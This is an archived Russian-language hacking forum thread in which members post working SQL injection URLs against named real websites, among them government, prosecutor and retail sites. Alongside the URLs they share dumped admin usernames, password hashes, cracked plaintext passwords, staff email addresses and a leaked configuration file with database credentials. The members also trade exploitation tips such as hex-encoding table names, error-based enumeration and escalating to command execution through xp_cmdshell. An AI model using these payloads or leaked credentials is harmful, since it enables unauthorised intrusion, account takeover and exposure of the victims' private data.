Просмотр полной версии : SQL Инъекции
-m0rgan-
30.12.2008, 02:51
// Оффтоп
A чё это за naira_clients?
Обьясните плиз!
-=Razor=-
30.12.2008, 03:21
http://www.vfs.com/curriculum.php?id=3+union+select+1,2,3,unhex(hex(g roup_concat(table_name))),5+from+information_schem a.tables/*
ТИЦ:160
PR:6
5.0.22-standard-logwebmaster@localhostvfscom_db
http://www.womenastronomers.com/star.php?Id=3+union+select+1,2,3,4,concat(version( ),database(),user())/*
PR:2
4.1.22-standardwomenast_Astronomerswomenast_User@localhos t
..::TROYAN::..
30.12.2008, 03:25
http://gta.com.ua/file_details.phtml?id=-824+union+select+1,2,3,concat(user(),0x3a,version( ),0x3a,database()),5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20--
gtacom_gta@localhost:5.0.51a-community:gtacom_gta
http://gta.com.ua/file_details.phtml?id=-824+union+select+1,2,3,table_name,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20+from+information_schema .tables+limit+0,1--
http://gta.com.ua/file_details.phtml?id=-824+union+select+1,2,3,concat(username,0x3a,passwo rd),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+fro m+admin+limit+0,2--
adminus:lPO7YBB0
PR : 3
ТиЦ : 300
Samuseum.org - PR5 ~1.5к
http://www.samuseum.org/calendar/event.php?uid=-418'+union+select+1,2,email,4,5,6,7,8,9,10,11,12,1 3,14,15,16+from+user/*
Brightstar.com.tw - PR3 ~0.5к
http://www.brightstar.com.tw/product_info_e.php?UID=-772'+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_w s(0x3a,name,pwd),13,14,15,16,17,18,19,20,21,22,23, 24,25,26,27,28,29,30,31,32,33+from+admin/*
http://www.brightstar.com.tw/asp_admin/index.fcgi
pro100.tv
Я конечно ХЗ но для меня это канал сектантов (CNL)
Целыми днями трындят о "боге", это ппц, сектанты херовы!!!111
Ни админки, ничё не нащёл, у них сайт из 1 файла штоле...
http://pro100.tv/comments.php?curid=-1'+UNION+SELECT+1,2,3,4,5,6,concat_ws(0x3a,VERSION (),DATABASE(),USER()),8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38/*
А вот и сам канал
http://www.cnl.tv/watch_us/programs.php?programID=-1'+UNION+SELECT+concat_ws(0x3a,VERSION(),DATABASE( ),USER())/*
Вывод в тайтле
5.0.45:cnl_tv_2008:cnl_tv_user@localhost
===============
Итого:
http://www.cnl.tv/admin/
emanuel:supertest
http://www.cnl.tv/admin/file_editor.inc.php токо чёто он не пахает :(
Прав нет =\
Зато конфиг есть :D
/mySQL
$DatabaseName = "cnltv3_utf8";
$DbHostName = "localhost";
$DbUserName = "cnltv3_cnluser";
$admin_password = "cnlconnect"; // for admin directly in pages. like Read more function.
Серверный путь походу /home/cnl.tv/html
Аа... Или "D:/WebServers/home/nlbc/cnl.tv"; //D:/WebServers/home/192.168.0.24/www
Тута есть залитие имаг, если выбрать Flag icon то должна залиться в http://www.cnl.tv/mages/flags/ но толи у мя проксик левый толи прав нет
..::TROYAN::..
30.12.2008, 05:13
http://guttenberg.org.ru/f_mess.php?thing=-3+union+select+1,2,3,4,concat(user(),0x3a,database (),0x3a,version()),6--
tarifsss_gb@localhost:tarifsss_gb:4.0.27-log
24rus.ru - PR6 ~2.5к
http://www.24rus.ru/print.php?UID=-35802+union+select+1,2,3,4,5,version(),7,8,9,10,11 ,12,13,14,15,16/*
хоть какойто вывод ;)
19rus.ru - PR6 ~2.5к
http://www.19rus.ru/more.php?UID=8964+union+select+1,table_name,3,4,5, 6,7,8,9,10,11,12,13,14,15,16+from+information_sche ma.tables+limit+23,1/*
наслаждаемся пищей) делимся результатов в пм )
masternet
30.12.2008, 11:14
http://www.alta.ru/faq.php?id=-1+union+select+concat_ws(char(32,45,32),admin_id,l ogin,password,checknum,agent,email,access),2,3,4,5 +from+altaru_dealers.svts_admins--
ТИЦ : 450 PR: 5
Есть форум с 2722 юзеров.
--------
http://www.medialine.com.ua/main.php?menu_item=-55/**/union/**/select/**/version()#
А далее мозгов не хватает
http://www.megaprint.com.ua/product.php?idr=107&idt=-1+union+select+group_concat(table_name,0x3a,table_ rows),2,3,4,5,6+from+information_schema.tables--
http://www.medialine.com.ua/main.php?menu_item=-55/**/union/**/select/**/version()#
А далее мозгов не хватает
http://www.medialine.com.ua/main.php?menu_item=-55/**/union/**/select/**/concat(login,0x3a,password)/**/from/**/users+limit+0,1--
Gemini12
30.12.2008, 19:38
наткнулся на:
http://line.kz/reviews/?cat=13&id=www.site.com/view.asp?id=-1+union+select+1,2,3,4,5,6,7,8--
выдает
Microsoft OLE DB Provider for SQL Server ошибка '80040e10'
дошел до
http://line.kz/reviews/?cat=13&id=www.site.com/view.asp?id=-1+union+select+1,2,3,4,5,6,7,8*+from+msysobjects+i n+'.'
выдал : Îòñóòñòâóåò çíà÷åíèå äëÿ îäíîãî èëè íåñêîëüêèõ òðåáóåìûõ ïàðàìåòðîâ.
может еще кто глубже капнет? а то интересно, че там в конце тунеля! )))
mailbrush
30.12.2008, 20:40
Gemini12, тут нет скули!
Jokester
30.12.2008, 21:03
Gemini12, тут нет скули!
Серьёзно? А что там есть? :)
https://forum.antichat.ru/showpost.php?p=1024180&postcount=4430
prescott
30.12.2008, 22:23
Пр0kуратуpa Пермск0го Края ;)
http://www.prokuror.perm.ru/posts?id=-1+union+select+1,2,3,version(),5,DATABASE(),7,8,9--+
information_schema закрыта, или ее тупо нет, ибо версия 4, таблу с админами так и не нашел, админка в /admin/
Legis.krsn.ru - PR5 ~1.3к
http://www.legis.krsn.ru/lawsinfo.php?UID=-1+union+select+1,2,3,4,5,6,7,8,9,10,version(),12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
4 ветка..
Arabwestreport.info - PR5 ~1.3к
http://www.arabwestreport.info/AWR/article_details.php?article_id=-20182+union+select+1,2,concat_ws(0x3a,admin_userna me,admin_pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19+from+admins--
/webmanager
Co.dona-ana.nm.us - PR5 ~1.3к
http://www.co.dona-ana.nm.us/news/story.php?news_ID=-44+or+1=1/*
Rockportartcenter.com - PR4 ~0.7к
http://www.rockportartcenter.com/exhibitions/detail.php?uid=45'+union+select+1,2,3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,email+from+ user+limit+1,1/*
http://carepa.org/detail.php?uid=-53+union+select+1,2,3,4,5--
Не могу раскрутить, через order by показывает что там от 1 до 5 колонок но постоянно ошибка вылазит
prescott
31.12.2008, 01:09
http://carepa.org/detail.php?uid=-53+union+select+1,2,3,4,5--
Не могу раскрутить, через order by показывает что там от 1 до 5 колонок но постоянно ошибка вылазит
Это значит скорее всего что параметр используется больше, чем в одном запросе, первый запрос прокатывает с 5 полями, второй выдает ошибку. В таких случаях или перебор, или ищи другой инъект. (Инъект не приходит в одиночку =)
например вот нормальная инъекция с этого сайта
http://carepa.org/mixers.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,0,1--+
UPD: данные админа
http://carepa.org/mixers.php?id=-1+union+select+1,username,3,4,5,6,7,8,9,0,password +from+rc_admin--+
http://carepa.org/admin/
admin
$1$.y3.ta3.$Jk5.iyx3OT9IZlhJ8CKQy/
КТо скажет что за хэш?
lexus5122
31.12.2008, 02:07
http://dixis.ru/actions.php?act_id=-347+union+select+1,2,group_concat(column_name),4,5 %20%20,6,7,8,9,10,11,12,13+from+information_schema .columns+where+table_name=0x494d45495f7573657273--
Помогите пожалуйста достать админ пасс и лог в ПМ => дам адресс админки
spherics
31.12.2008, 03:45
http://ishare.rediff.com/music_category.php?id=-40+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,conc at_ws(0x3a3a,version(),user(),database())--
5.1.30-log
imusicusr@10.50.31.24
imusic
http://www.fitnesstogether.com/news_view.php?id=-40+union+select+1,2,3,4,5,6,concat_ws(0x3a3a,versi on(),user(),database())--
5.0.27-community-nt
admin_suite_user@localhost
admin_suite
http://www.carli.illinois.edu/reports/prodvett/indiv_prop.php?id=-40+union+select+1,2,3,4,5,6,concat_ws(0x3a3a,versi on(),user(),database()),8,9,10,11,12,13,14,15,16/*
5.0.38-Ubuntu_0ubuntu1.4-log
signupsuper@localhost
suggest
http://www.herpconstrust.org.uk/gallery/pic.php?id=21+union+select+1,2,concat_ws(0x3a3a,ve rsion(),user(),database()),4,5,6,7/*
4.1.19-standard-log
herpconstrust@localhost
herpconstrust
http://www.awards-world.com/art.php?id_article=-22+union+select+1,2,3,user(),5,6,7,8,9--&id_page=21
awardswo_admin@localhost
4.1.22-standard-log
awardswo_AWARDSWORLD
Всех с наступающим!
http://www.carli.illinois.edu/reports/prodvett/indiv_prop.php?id=-40+union+select+1,2,3,4,5,6,concat_ws(0x3a3a,versi on(),user(),database()),8,9,10,11,12,13,14,15,16/*
Вытащил таблицу с колонками а он пишет:
Table 'suggest.cms_users' doesn't exist
http://www.carli.illinois.edu/reports/prodvett/indiv_prop.php?id=-40+union+select+1,2,3,4,5,6,concat(username,char(5 8),password),8,9,10,11,12,13,14,15,16+from+cms_use rs+limit+0,1/*
cms_users:email
cms_users:password
cms_users:username
spherics
31.12.2008, 05:58
Пройдёмся по магазинчикам!
http://shopping.sify.com/shopping/category.php?pid=20282+union+select+1,2,concat_ws( 0x3a3a,version(),user(),database()),4/*&?vsv=MALLHPBOOKS
Database Version: 5.0.45-log
Database name: cms
User name: spfclogin@202.144.65.156
http://www.cafegadgets.com/advanced_search_result.php?keywords=d2&search_in_description=1&categories_id=&inc_subcat=1&manufacturers_id=-94+union+select+concat_ws(0x3a3a,version(),user(), database())--
5.0.67-community-log
cafe_cafe@localhost
cafe_cafeindia Webstore
Octave_Parango
31.12.2008, 06:44
vladvk,
Правильно так:
http://www.carli.illinois.edu/reports/prodvett/indiv_prop.php?id=-40+union+select+1,2,3,4,5,6,concat(username,char(5 8),password),8,9,10,11,12,13,14,15,16+from+cms.cms _users+limit+0,1/*
Gemini12
31.12.2008, 11:25
http://line.kz/reviews/?cat=13&id=1+or+1=(SELECT+TOP+1+id+FROM+vacancy)--
Кто дальше сможет? ))
http://www.amazingsportsphotos.com/shop/insertorder.cfm?CFID=3371&CFTOKEN=53570656+union+select+1,2,3,4,5,6,7,8,9,10 ,11,12,13,14--
5.0.67-community-nt-log
http://www.appointmentsatfive.com/insertorder.cfm?CFID=102&CFTOKEN=94729224+union+select+1,2,3,version(),5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19--
5.0.67-community-nt-log
;)
Gemini12
31.12.2008, 13:57
Пройдёмся по магазинчикам!
[B]http://shopping.sify.com/shopping/category.php?pid=20282+union+select+1,2,concat_ws( 0x3a3a,version(),user(),database()),4/*&?vsv=MALLHPBOOKS
Database Version: 5.0.45-log
Database name: cms
User name: spfclogin@202.144.65.156
http://shopping.sify.com/shopping/category.php?pid=20282+union+select+1,2,concat_ws( 0x3a,userid,Name,Password,Email,Tel_Off,Tel_Res,Mo bile,Enable,Creation_Date,Last_Mod_Date),4+from+Us er_Master+where+id='1'--
admin:F1A61D77BD363820BCAB7093B433360876BDDC34
хэш в пм плз, зарание спс :D
Да, и еще, кто админку нашел?
ILYAtirtir
31.12.2008, 14:53
http://line.kz/reviews/?cat=13&id=1+or+1=(SELECT+TOP+1+id+FROM+vacancy)--
Кто дальше сможет? ))
Дальше смотришь все таблицы в information_schema.
http://line.kz/reviews/?cat=13&id=1+or+1=(SELECT+TOP+1+table_name+from+informatio n_schema.tables)--
Microsoft OLE DB Provider for SQL Server ошибка '80040e07'
Syntax error converting the nvarchar value 'tbl_comps' to a column of data type int.
/reviews/default.asp, line 40
Чтобы дальше смотреть используем NOT+IN
http://line.kz/reviews/?cat=13&id=1+or+1=(SELECT+TOP+1+table_name+from+informatio n_schema.tables+where+table_name+NOT+IN('tbl_comps '))--
Ну и так дальше.
Gemini12
31.12.2008, 14:59
Дальше смотришь все таблицы в information_schema.
Чтобы дальше смотреть используем NOT+IN
Ну и так дальше.
умный да? я это уже использовал, как думаешь я дошел до 'vacancy'...
ILYAtirtir
31.12.2008, 18:00
system_user "sa",значит дальше можно попробывать выполнить команды,xp_cmdshell итд
Gemini12
31.12.2008, 18:09
system_user "sa",значит дальше можно попробывать выполнить команды,xp_cmdshell итд
А прав хватит?
"Дайвинг-клуб Мегадайв"
http://megadive.ru/index.php?p=5&ti=-1+union+select+1,2,3,version(),5,6,7,8,9,10--
Thrasher88
31.12.2008, 20:16
www.khonshop.com - арабский шоп
http://www.khonshop.com/viewnews.php?id=1+union+select+1,2,3,concat_ws(0x3 a3a,version(),user(),database()),5,6,7,8,9,10,11/*
4.0.18-max-nt::khonshop@localhost::khonshop
Google PR: 3
www.wyoptv.org - сайт национального природного парка в штате Вайоминг
http://www.wyoptv.org/news/viewnews.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a3a,version( ),user(),database()),7,8--
5.0.32-Debian_7etch6-log::wyoptv@localhost::wyoptv
Google PR: 5
+открытая для гостей админка wyoptv.org/admin/ :)
yogacenter.ru - йога-центр Просветление :)
http://yogacenter.ru/viewnews.php?id=-1+union+select+1,2,concat_ws(0x3a3a,version(),user (),database())+from+information_schema.tables--
5.0.67-community-log::mh3yoga_yoga@localhost::mh3yoga_new
Google PR: 5
Yandex тИЦ: 300
Gemini12
31.12.2008, 20:43
+открытая для гостей админка wyoptv.org/admin/ :)
Представляю, сидел скулю химичил, пассы вытащил, тут нааа.... и админка общаковская )))
Thrasher88
31.12.2008, 21:14
Представляю, сидел скулю химичил, пассы вытащил, тут нааа.... и админка общаковская )))
Примерно так и было :D
-=Razor=-
01.01.2009, 01:07
http://www.ruslime.ru/form.php?id=-6+union+select+1,concat(version(),database(),user( )),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22,23,24,25,26,27,28,29,30/*
4.0.17-standardjunooskol_ruslimejunooskol_rusl@localhost
http://www.justmarriedinvenice.com/form.php?id=-6+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,unhex(hex(group_concat(table_name))),18,19,20, 21+from+information_schema.tables--
masternet
01.01.2009, 02:24
http://www.feldgrau.com/articles.php?ID=-1+union+select+1,2,3,4,unhex(hex(group_concat(tabl e_name))),6,7,8+from+information_schema.tables--
ТИЦ : 90 PR: 5
----------
-Onotole-
01.01.2009, 03:01
http://www.feldgrau.com/articles.php?ID=-1+union+select+1,2,3,4,unhex(hex(group_concat(tabl e_name))),6,7,8+from+information_schema.tables--
ТИЦ : 90 PR: 5
----------
бля,наркоман,НОВЫЙ ГОД ЕПТ!!1!!!(итс нот а флуд)
-m0rgan-
01.01.2009, 03:44
Новогодний диз=)
http://www.ztopclub.ru/afisha/?view=-1+union+select+1,2,3,4,5,concat_ws(0x3a,login,pass wd),7,8,9,10,11+from+users--
Логин/пасс:
arius:0e2ff58f89a19e0750d33c2af5d605c6
---------------------------------------------------
The End!
-m0rgan-
01.01.2009, 04:09
http://www.cla.co.uk/news.php?id=-60+union+select+1,concat_ws(0x3a,user,password),3, 4,5,6,7,8,9+from+mysql.user--
логин/пасс:
root:2cd42df3698b9525
--------------------------------------------------------
The End!
-m0rgan-
01.01.2009, 04:41
Немного правительственных ресурсов:
http://www.culture.gov.jo/view_arch.php?src=news&id=-1+union+select+1,2,3,concat(0x3a,user_name,passwor d),5,6,7,8,9,10,11,12+from+users--
логин/пасс:
IkEr7JveUVCF:sYQQ6WRNSpBi
---------------------------------------------------------
http://www.ere.gov.al/galeri_info.php?lang=EN&idr=-1&ida=10+and+1=2+union+all+select+1,2,3,4,concat(0x3 a,username,password),6+from+editor--
логин/пасс:
adminfe01ce2a7fbac8fafaed7c982a04e229
------------------------------------------------------------
The End!
-m0rgan-,
arius:0e2ff58f89a19e0750d33c2af5d605c6
=
arius:hl59zf ;)
admin:fe01ce2a7fbac8fafaed7c982a04e229
=
admin:demo
root:2cd42df3698b9525
=
root:qpl129
http://www.mmafightsearch.com/show_event.php?eid=23'+union+select+1,2,3,4,5,6,7, 8,9,10,11,12,13,table_name,15,16,17,18,19,20+from+ information_schema.tables/*
http://www.boulevard-gastspiele.de/show_event.php?eID=-4'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,version(),26,27,28/*
4.0.24-max
http://www.heartheworld.org/event.php?id=-783+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,4 8,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64, 65,66,67,68,69,70,71,72,73,74/*
4.1.25-Debian_mt1-log
Всех с НГ
Xcontrol212
01.01.2009, 17:31
http://anewpark.ca/parkupdate.php?id=-1+union+select+1,2,pass,4,5+FROM+auth/*
http://anewpark.ca/parkupdate.php?id=-1+union+select+1,2,user,4,5+FROM+auth/*
cmv ;XXViwWKTqWaWM
-m0rgan-
01.01.2009, 20:30
Прокуратура Чувашской Республики:
http://www.chuvprok.gov.ru/news.php?id=-157+union+select+1,concat_ws(version(),user(),data base()),3,4,5--
Юзер/версия/бд:
prokuratura@localhost4.0.17-ntprokuratura
Увы поиметь админский ак не удалось, ибо не подобрал таблицу с юзерами(((
-----------------------------------------------------------
The End!
-m0rgan-
01.01.2009, 21:48
Есче один правительственный ресурс:
http://www.voladm.gov.ua/news.php?id=-4196+union+select+1,2,3,4,5,concat_ws(0x3a,table_s chema,table_name,column_name),7,8,9,10,11,12,13,14 +from+information_schema.columns+limit+1098,1--&today=&lang=ukr
Так же не докрутил, ибо в падлу перебирать 1098 таблиц(((
Так что только:
http://www.voladm.gov.ua/news.php?id=-4196+union+select+1,2,3,4,5,concat_ws(version(),us er(),database()),7,8,9,10,11,12,13,14--&today=&lang=ukr
версия/юзер/бд:
obladmin_2@localhost5.1.26-rcvoladm_gov
-m0rgan-
01.01.2009, 22:11
Более удачный хак:
Public Utilities Commission
http://www.pucbahamas.gov.bs/news.php?id=-82+union+select+1,2,3,4,concat_ws(0x3a,name,passwo rd),6,7,8,9,10,11,12,13+from+admin--&type=news&action=display
Логин/пасс:
Karen Rigby:3e6f2290ee4e701055be72757a545880
Lisa Bellot:2664085da4a728c6720f488de1f98b6b
Kemp:3c195b52a144b6acc18488fcd9db1d40
Whitfield:e705f73a79b4dcad2aed164ff79d91e9
---------------------------------------------------------------
http://www.prokredo.ru/college.php?id=-21+union+select+1,password,login,4,5,6,7,8,9,10,11 ,12,13,14+from+kredo_admins
n:mooncat
p:sql
"Бизнес-портал о реальном секторе экономики"
http://ugmk.info/?art=1230566216[sql]
5-ая ветка.
Так же не докрутил, ибо в падлу перебирать 1098 таблиц(((
http://www.voladm.gov.ua/news.php?id=-4196+union+select+1,2,3,4,5,group_concat(table_sch ema,0x3a,table_name),7,8,9,10,11,12,13,14+from+inf ormation_schema.columns+where+column_name=0x6c6f67 696e--
ЗЫ: Посты можно редактировать.
spherics
01.01.2009, 23:53
Магазин проги для создания музыки Довольно хорошая прога в базе серийники итд в общем всё красиво..
http://www.fxpansion.com/index.php?page=42+union+select+concat_ws(0x3a3a,ve rsion(),user(),database())--
Database Version: 5.0.67-log
Database name: amulet_fxp
User name: amulet_5@209.68.4.60
Getting Data from table admin (20 Rows) from database amulet_fxp
Fields id:name:passwd:email
[1]:5:FxAdmin:6db2c691d93ff83982ca1cddcad249bd:andrea s@fxpansion.com
[2]:7:angus:ad9f3b061bc2814cfe7b3396ef579290:angus@fx pansion.com
[3]:8:skot:49043fd7063a5c3797c3f8b799f8c417:skot@fxpa nsion.com
[4]:9:rhiannon:8ec6dbb2bb58ef90bec34b32f700416c:rhian non@fxpansion.com password:felicity
[5]:11:steve:ecee098cb8e78f5aba61f8bf15fcc8e9:steve@f xpansion.com
[6]:27:julia:c2e285cb33cecdbeb83d2189e983a8c0:julia@f xpansion.com pass:julia
[7]:13:mayur:ff65543ed4d0eeb56155c32596607d0a:mm@fxpa nsion.com
[8]:14:paul:facd4bc86b7f12740c83bcaa4e75ae0a:paul@fxp ansion.com pass:exponent
[9]:15:drew:edc7b78aa1f15e32e473fe58a551cff5:drew@fxp ansion.com
[10]:16:rory:3c72a3b545abc540a09dd8a9d2949975:rory@fxp ansion.com
[11]:17:mully:03182bd6abc890c03027da69ba599d40:mully@f xpansion.com
[12]:18:robert:1806b29558477d521373c0d47675f175:robert @fxpansion.com
[13]:19:andy:10951f38de98894210cf39ee037bf5e9:andy@fxp ansion.com
[14]:20:ryan:365c2d3ed6ddc375841db8402bccc0ee:ryan@fxp ansion.com
[15]:24:rus:a9cb4024aedea7770c82b51cd0c452e4:rus@fxpan sion.com
[16]:22:peter:fff66a4d00c8ed7bb7814ff29d0faca2:peter@f xpansion.com pass:ambient
[17]:23:tom:e0f60286791b829d69fcf44c13aa5b15:tom@fxpan sion.com
[18]:25:clare:fd99fefa10ecdc781cf8016cb5381f0c:clare@f xpansion.com pass:marmite
[19]:29:terry:211be8df297928faeedd89e3a4f1a75a:terry@f xpansion.com
Palm Online
http://www.palmq.ru/article.php?sid=-1386+union+select+1,2,3,version(),user(),6,7,8,9,1 0,11%20--
Имя таблицы мне узнать удалось - nuke_users
http://www.palmq.ru/article.php?sid=-1386+union+select+1,2,3,4,5,table_name,7,8,9,10,11 +from+information_schema.tables+limit+72,1%20--
Но почему-то столбцы узнать не получается.. Может я не правильно составляю запрос?
http://www.palmq.ru/article.php?sid=-1386+union+select+1,2,3,4,5,column_name,7,8,9,10,1 1+from+information_schema.columns+where+table_name ='nuke_users'+limit+1,1%20--
Но почему-то столбцы узнать не получается.. Может я не правильно составляю запрос?
Всё правильно, вот только nuke_users нужно зашифровать в hex.
Вот так:
http://www.palmq.ru/article.php?sid=-1386+union+select+1,2,3,4,5,column_name,7,8,9,10,1 1+from+information_schema.columns+where+table_name =0x6e756b655f7573657273+limit+1,1--
www.wwrn.org, PR = 5
http://www.wwrn.org/article.php?idd=-1+union+select+1,2,3,4,5--
http://www.wwrn.org/article.php?idd=-1+union+select+1,2,concat(version(),':',database() ,':',user()),4,5--
version() - 5.1.26-rc
database() - wwrn
user() - wwrn@localhost
www.writersstore.com, PR = 5
http://www.writersstore.com/article.php?articles_id=604'+limit+0+union+select+ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--+0
http://www.writersstore.com/article.php?articles_id=604'+limit+0+union+select+ 1,2,concat(version(),':',database(),':',user()),4, 5,6,7,8,9,10,11,12,13,14,15--+0
version() - 4.0.17-log
database() - tws_store
user() - tws@216.92.131.39
kolenwal
02.01.2009, 01:11
http://www.matica.com/play_game.php?gameID=-22+union+select+1,concat_ws(char(58),version(),use r(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15--
5.0.67-community:agency23_alex@localhost:agency23_matica
В базе около 3000 юзеров,7 баз
Латвийская справочна служба.
http://yp.interinfo.lv/index.php?popup=1&lang=2&fEASY=&clid=-1'+union+select+1,2,3/*
User: dba@
Version: 5.0.16-nt-max-log
Database: do
http://yp.interinfo.lv/index.php?popup=1&lang=2&fEASY=&clid=-1'+union+select+1,aes_decrypt(aes_encrypt(user(),0 x41),0x41),3/*
http://yp.interinfo.lv/index.php?popup=1&lang=2&fEASY=&clid=-1'+union+select+1,aes_decrypt(aes_encrypt(version( ),0x41),0x41),3/*
http://yp.interinfo.lv/index.php?popup=1&lang=2&fEASY=&clid=-1'+union+select+1,aes_decrypt(aes_encrypt(database (),0x41),0x41),3/*
Далее знакомый сценарий - information_schema:
http://yp.interinfo.lv/index.php?popup=1&lang=2&fEASY=&clid=-1'+union+select+1,aes_decrypt(aes_encrypt(table_na me,0x41),0x41),3+from/**/information_schema.tables/*
.. или mysql.user по умолчанию:
http://yp.interinfo.lv/index.php?popup=1&lang=2&fEASY=&clid=-1'+union+select+1,aes_decrypt(aes_encrypt(user,0x4 1),0x41),3+from/**/mysql.user+limit+1,1/*
http://yp.interinfo.lv/index.php?popup=1&lang=2&fEASY=&clid=-1'+union+select+1,aes_decrypt(aes_encrypt(password ,0x41),0x41),3+from/**/mysql.user+limit+1,1/*
..::TROYAN::..
02.01.2009, 03:39
http://www.domkino.spb.ru/description.php?id=-406+union+select+1,2,3,4,5,6,7,8,9,concat(user(),0 x3a,version(),0x3a,database()),11,12--
domkinospbru@78.108.81.211:5.0.67:domkinospbru
http://www.domkino.spb.ru/description.php?id=-406+union+select+1,2,3,4,5,6,7,8,9,concat(login,0x 3a,password),11,12+from+user--
shurik:ahin
PR:5
тИЦ: 475
Админку ненашёл=//
"OOO Румтехтранс"
http://www.kaolin-gob.kiev.ua/index.php?inc=docs&key=r&id=-1+union+select+1,version(),3,4,5,6,7,8--
"Webzavod - дизайн, разработка сайтов"
http://www.webzavod.com.ua/?mid=-1+union+select+1,2,3,4,5,6,7,version()--
На сайтах, в портофолио, так же есть инъекция.
spherics
02.01.2009, 06:50
Такс начинаем создавать свои игры !!!
http://www.xgamestation.com/view_product.php?id=-33+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ ws(0x3a3a,version(),user(),database()),14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28--
Version:5.0.27-community-nt
User:Administrator@localhost
Database:gamestation
http://www.xgamestation.com/view_product.php?id=-33+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ ws(0x3a3a,user,password),14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28+from+mysql.user--
root::*8FFA6C4A39732DF6BF13184E70BE8FAFC475656A
Administrator::*514CF3488C00733A185644DCC8DBB8BEE6 3B180F
gruvii::*BD2B2BB6A9881E0FE04B20ED719246D01071975D
xgamestation::*1BA76162951F45EE1C6CB19DD64B39325E0 93978
eric::*D2E840839C2168F0AB422575182CF92EFDF36C7B
http://www.b2cpowershop.com/tell_a_friend.php?goods_id=-1641+union+select+concat_ws(0x3a3a,version(),user( ),database())--
Version:5.0.22-community-max-nt
User:b2cbattery@216.10.246.71
Database:btwocp0wersh0per
http://www.compel.com.tr/Include/Modules/ProductDetail.php?CatID=22&ManID=21&ProID=-2893+union+select+concat_ws(0x3a3a,version(),user( ),database()),2,3,4,5,6,7--
Version:4.1.22-standard
User:compelc_iskender@localhost
Database:compelc_compel
http://www.mandeno.co.nz/print/print_item_details.php?itemid=-3883+union+select+1,2,concat_ws(0x3a3a,version(),u ser(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,3 3,34,35--
Version:4.0.20-standard
User:mandeno@localhost
Database:mandenoshop
Australian Community Radio Podcasts!
http://www.cpod.org.au/page.php?id=-67+union+select+1,2,concat_ws(0x3a3a,version(),use r(),database()),4,5,6,7,8--
PR:5
Version:5.0.45-log
User:CBAA@localhost
Database:cbaa
Торговля книгами!
PR:6
http://www.lcoastpress.com/book.php?id=-33+union+select+1,2,concat_ws(0x3a3a,version(),use r(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20--
Version:4.1.22
User:lcpdb@localhost
Database:lcpsite
Никто не хочет дальше покрутить:
http://www.designtrend.hu/index.php?inc=cikk&CId=-316/**/union/**/select/**/table_name+from+information_schema.tables--
1222:The used SELECT statements have a different number of columns select * from cikk where id=-316/**/union/**/select/**/table_name from information_schema.tables-- Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /web/arvense/www.designtrend.hu/inc/cikk.php on line 56Cikk // - Adatbázis hiba - 1054:Unknown column 'CHARACTER_SETS' in 'where clause' select * from menu where id=CHARACTER_SETS Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /web/arvense/www.designtrend.hu/inc/cikk.php on line 91 - Adatbázis hiba - 1064:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1 select * from menu where id= Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /web/arvense/www.designtrend.hu/inc/cikk.php on line 91 - Adatbázis hiba - 1064:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and aktiv=1' at line 1 select count(*) from menu where fokategoria= and aktiv=1 Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /web/arvense/www.designtrend.hu/index.php on line 88
http://www.designtrend.hu/index.php?inc=cikk&CId=-316/**/union/**/select/**/version()--
1222:The used SELECT statements have a different number of columns select * from cikk where id=-316/**/union/**/select/**/version()-- Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /web/arvense/www.designtrend.hu/inc/cikk.php on line 56Cikk // - Adatbázis hiba - 1064:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '.67' at line 1 select * from menu where id=5.0.67 Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /web/arvense/www.designtrend.hu/inc/cikk.php on line 91 - Adatbázis hiba - 1064:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1 select * from menu where id= Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /web/arvense/www.designtrend.hu/inc/cikk.php on line 91 - Adatbázis hiba - 1064:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and aktiv=1' at line 1 select count(*) from menu where fokategoria= and aktiv=1 Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /web/arvense/www.designtrend.hu/index.php on line 88
Никто не хочет дальше покрутить:
Database:dcmagazin
Version: 5.0.67
User: dcmagazin@localhost
http://www.designtrend.hu/index.php?inc=cikk&CId=-316/**/union/**/select/**/table_name+from+information_schema.tables+limit+1, 1--
Но в целом смысла не имеет, так как:
